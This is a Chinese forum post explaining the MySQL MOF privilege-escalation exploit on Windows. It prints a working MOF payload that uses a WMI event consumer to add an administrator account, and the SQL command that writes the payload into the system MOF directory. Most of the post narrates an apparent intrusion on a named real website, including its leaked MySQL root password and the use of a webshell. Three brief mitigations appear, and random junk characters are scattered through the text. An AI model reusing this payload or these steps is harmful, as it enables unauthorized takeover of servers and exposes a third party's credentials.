找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2347|回复: 0
打印 上一主题 下一主题

Mysql mof扩展漏洞实例与防范

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:49:49 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Mysql mof扩展漏洞防范方法7 a$ N/ C: P0 Z# ^( ^

  |9 L  w4 l8 y: L1 E网上公开的一些利用代码:; W. P* r  e* Z- ~
) h/ H  Z) `. s! e
#pragma namespace(“\\\\.\\root\\subscription”)
, R- A- D6 ?" a
( L5 _& T5 M- xinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
/ p& l  g/ ?2 }* O- w8 A* j- P( V& F4 m; Q% C0 H9 M+ d

: |! V) ]5 y3 H. J) i8 V9 c0 g) M. C/ a, ^: W
  S' U/ m* x" d8 U. |2 Q7 w4 S, K
  M9 \' a9 `& u7 c4 S1 O
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
5 i0 \% R& B# j  l! N4 O+ O! j从上面代码来看得出解决办法:& S0 y+ L' n' n2 n( F
0 S5 m/ w4 |+ `- @' \
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
" g  l! G& s6 x8 y3 |2 z' D% _; |* d* |" _! [. C6 w$ X$ |4 `; a2 d0 `; v
2、禁止使用”WScript.Shel”组件
5 V* ]) }) e8 z$ D+ L3 T3 p% c- Z* g5 p* E" V
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER+ {5 N: O& c) U( o: a7 U/ J
3 W8 V$ S/ s- p( q
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
; ^8 X, T( m* p  x3 q3 \6 V
0 c# d/ ~# t* I% A" s事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
3 ?4 q$ U4 T3 ^) |) [
+ c, U( k; u3 V6 _但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
9 ~" U. x# e) S  O# C& o+ I# m# _, e, Y
看懂了后就开始练手吧
& w3 L, s- y: Q7 F" B9 q/ C" M* x6 ]
http://www.webbmw.com/config/config_ucenter.php 一句话 a4 c7 o' v/ v3 s4 |$ e$ x& r
# P  q! i  G. Y" F6 y
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
3 j6 W2 u# f4 Q7 U5 Y; d9 v& f1 W  _% a) T; K/ S6 M% x+ }3 X) @* _% S
于是直接用菜刀开搞
" [  x& p) X. d; x) b5 x4 d6 l1 N% Q( u& i
上马先0 w6 q8 D4 V6 A+ t" N+ H7 N
2 X$ x, I" p; S: k
既然有了那些账号 之类的 于是我们就执行吧…….
( W. y2 O& r5 _' `- Q) P' W  A/ P1 \3 [$ E
小小的说下, I8 V( o& f5 w# ~

+ E! D9 X7 I+ h, L- y在这里第1次执行未成功        原因未知
2 X2 B) v+ K5 |3 w3 r# b
/ t0 h2 y+ R9 t我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
5 L' d" k& {* P& @& T6 u) b+ Z' G0 v" U. T  Q& @/ L0 \
#pragma namespace(“\\\\.\\root\\subscription”)
; \- W# S# F& M& W0 }7 n- H0 N
" c! ~! q( b/ d3 r- Kinstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };  \+ P0 \$ F1 \3 A' m
, X6 i8 x4 Z) K! c; C1 d
我是将文件放到C:\WINDOWS\temp\1.mof
" z, v. A: @6 _3 B. A1 W' Q
* k2 C7 \: y/ x" }所以我们就改下执行的代码7 C( {# f  U7 e$ Z
! j$ c0 k" S1 V/ M
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;/ h* u" L: s+ t0 ?
, |- k- j" V9 J' K

5 ^3 E) Q: e) e, Z
. S! E( B0 M! h9 k! x但是 你会发现账号还是没有躺在那里。。' V6 I! W& M. ?% _# S

+ y- e* ^' c6 w6 Z$ O5 @) k于是我就感觉蛋疼
4 m. M* _' V: L1 t" m3 H9 q' J
8 e6 w2 ~+ V; X  I! R就去一个一个去执行 但是执行到第2个 mysql时就成功了………
$ }, Y, y# b3 x0 r) @0 r, I" N8 p8 O, W7 b+ [/ f

& v2 z/ _  x  p6 s7 d" l! e8 b& E! D) `
但是其他库均不成功…+ [4 j0 l: h* q% d$ O3 _+ b

6 W" l. F3 p2 j4 g% }我就很费解呀 到底为什么不成功求大牛解答…2 K/ |$ ~% y6 z6 m
7 C! P! ]& c3 y

! ^0 y! M( e+ o# J+ V  O1 ~
6 K; B/ L1 \3 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表